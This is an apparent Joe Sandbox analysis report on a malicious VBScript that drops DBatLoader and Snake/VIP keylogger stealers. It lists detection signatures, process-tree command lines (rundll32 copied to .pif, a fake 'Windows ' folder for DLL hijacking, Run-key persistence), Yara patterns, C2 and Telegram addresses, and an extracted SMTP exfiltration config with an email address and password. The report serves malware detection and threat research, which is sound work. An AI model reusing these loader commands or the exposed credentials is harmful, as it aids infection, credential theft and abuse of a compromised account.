Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Draft doc PI ITS15235.vbs

Overview

General Information

Sample name:Draft doc PI ITS15235.vbs
Analysis ID:1618356
MD5:82fe72e4395ab69063ae37812e097fa5
SHA1:96692be9dcd400a38be42fc651d755f41d923efc
SHA256:8c4334177584d7aee981ada042ff60124cd81a2e51e7c1514f7e2dd22f9335b4
Tags:vbsuser-lowmal3
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: WScript or CScript Dropper
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 8 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: EBA92CF15278AF942976C5066229C1B0)
      • cmd.exe (PID: 3272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • extrac32.exe (PID: 2120 cmdline: extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • ndpha.pif (PID: 4428 cmdline: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif MD5: 889B99C52A60DD49227C5E485A016679)
      • fptrsiaN.pif (PID: 5316 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Naisrtpf.PIF (PID: 8 cmdline: "C:\Users\Public\Libraries\Naisrtpf.PIF" MD5: EBA92CF15278AF942976C5066229C1B0)
    • fptrsiaN.pif (PID: 1196 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Naisrtpf.PIF (PID: 4960 cmdline: "C:\Users\Public\Libraries\Naisrtpf.PIF" MD5: EBA92CF15278AF942976C5066229C1B0)
    • fptrsiaN.pif (PID: 2836 cmdline: C:\Users\Public\Libraries\fptrsiaN.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0000000F.00000001.1912204476.0000000000ED0000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 103 entries
          SourceRuleDescriptionAuthorStrings
          6.2.fptrsiaN.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          10.2.fptrsiaN.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          15.1.fptrsiaN.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          15.2.fptrsiaN.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          1.2.x.exe.213963a8.6.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x59ee0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x3ceb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x3d530:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x5bbba:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x5b800:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          • 0x5acb8:$s6: constructor or from DllMain.
          Click to see the 266 entries

          System Summary

          barindex
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fptrsiaN.pif, NewProcessName: C:\Users\Public\Libraries\fptrsiaN.pif, OriginalFileName: C:\Users\Public\Libraries\fptrsiaN.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5496, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, ProcessId: 5316, ProcessName: fptrsiaN.pif
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Naisrtpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naisrtpf
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\fptrsiaN.pif, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine|base64offset|contains: v, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", ProcessId: 8, ProcessName: wscript.exe
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Naisrtpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naisrtpf
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fptrsiaN.pif, NewProcessName: C:\Users\Public\Libraries\fptrsiaN.pif, OriginalFileName: C:\Users\Public\Libraries\fptrsiaN.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5496, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, ProcessId: 5316, ProcessName: fptrsiaN.pif
          Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine|base64offset|contains: , Image: C:\Users\Public\ndpha.pif, NewProcessName: C:\Users\Public\ndpha.pif, OriginalFileName: C:\Users\Public\ndpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6120, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , ProcessId: 4428, ProcessName: ndpha.pif
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\fptrsiaN.pif, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine|base64offset|contains: v, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", ProcessId: 8, ProcessName: wscript.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:06:26.839865+010028033053Unknown Traffic192.168.2.449733104.21.32.1443TCP
          2025-02-18T20:06:29.803226+010028033053Unknown Traffic192.168.2.449737104.21.32.1443TCP
          2025-02-18T20:06:33.801818+010028033053Unknown Traffic192.168.2.449741104.21.32.1443TCP
          2025-02-18T20:06:35.373471+010028033053Unknown Traffic192.168.2.449743104.21.32.1443TCP
          2025-02-18T20:06:36.939567+010028033053Unknown Traffic192.168.2.449747104.21.32.1443TCP
          2025-02-18T20:06:39.101639+010028033053Unknown Traffic192.168.2.449754104.21.32.1443TCP
          2025-02-18T20:06:40.554344+010028033053Unknown Traffic192.168.2.449759104.21.32.1443TCP
          2025-02-18T20:06:45.541670+010028033053Unknown Traffic192.168.2.449766104.21.32.1443TCP
          2025-02-18T20:06:46.733091+010028033053Unknown Traffic192.168.2.449769104.21.32.1443TCP
          2025-02-18T20:06:46.969866+010028033053Unknown Traffic192.168.2.449770104.21.32.1443TCP
          2025-02-18T20:06:50.065969+010028033053Unknown Traffic192.168.2.449779104.21.32.1443TCP
          2025-02-18T20:06:51.482947+010028033053Unknown Traffic192.168.2.449782104.21.32.1443TCP
          2025-02-18T20:06:51.636820+010028033053Unknown Traffic192.168.2.449783104.21.32.1443TCP
          2025-02-18T20:06:53.067473+010028033053Unknown Traffic192.168.2.449786104.21.32.1443TCP
          2025-02-18T20:06:57.081927+010028033053Unknown Traffic192.168.2.449791104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:06:24.533722+010028032742Potentially Bad Traffic192.168.2.449731132.226.8.16980TCP
          2025-02-18T20:06:26.191560+010028032742Potentially Bad Traffic192.168.2.449731132.226.8.16980TCP
          2025-02-18T20:06:27.707772+010028032742Potentially Bad Traffic192.168.2.449734132.226.8.16980TCP
          2025-02-18T20:06:36.954549+010028032742Potentially Bad Traffic192.168.2.449746132.226.8.16980TCP
          2025-02-18T20:06:38.612982+010028032742Potentially Bad Traffic192.168.2.449746132.226.8.16980TCP
          2025-02-18T20:06:39.982441+010028032742Potentially Bad Traffic192.168.2.449757132.226.8.16980TCP
          2025-02-18T20:06:42.968110+010028032742Potentially Bad Traffic192.168.2.449760132.226.8.16980TCP
          2025-02-18T20:06:43.421961+010028032742Potentially Bad Traffic192.168.2.449761132.226.8.16980TCP
          2025-02-18T20:06:45.125072+010028032742Potentially Bad Traffic192.168.2.449761132.226.8.16980TCP
          2025-02-18T20:06:46.354138+010028032742Potentially Bad Traffic192.168.2.449768132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:06:39.624443+010018100071Potentially Bad Traffic192.168.2.449756149.154.167.220443TCP
          2025-02-18T20:06:52.400498+010018100071Potentially Bad Traffic192.168.2.449784149.154.167.220443TCP
          2025-02-18T20:06:58.189821+010018100071Potentially Bad Traffic192.168.2.449792149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Draft doc PI ITS15235.vbsAvira: detected
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFAvira: detection malicious, Label: HEUR/AGEN.1326111
          Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1326111
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFReversingLabs: Detection: 75%
          Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 75%
          Source: C:\Windows \SysWOW64\NETUTILS.dllReversingLabs: Detection: 25%
          Source: Draft doc PI ITS15235.vbsVirustotal: Detection: 49%Perma Link
          Source: Draft doc PI ITS15235.vbsReversingLabs: Detection: 40%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor: info@irco.com.sa
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor: info12A
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor: mail.irco.com.sa
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor: logs202323@yandex.com
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor: 587
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpackString decryptor:

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org

          Compliance

          barindex
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\fptrsiaN.pifUnpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49750 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49764 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2
          Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
          Source: Binary string: _.pdb source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1748492146.000000001B344000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1870177247.0000000020025000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
          Source: Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
          Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000984000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000955000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
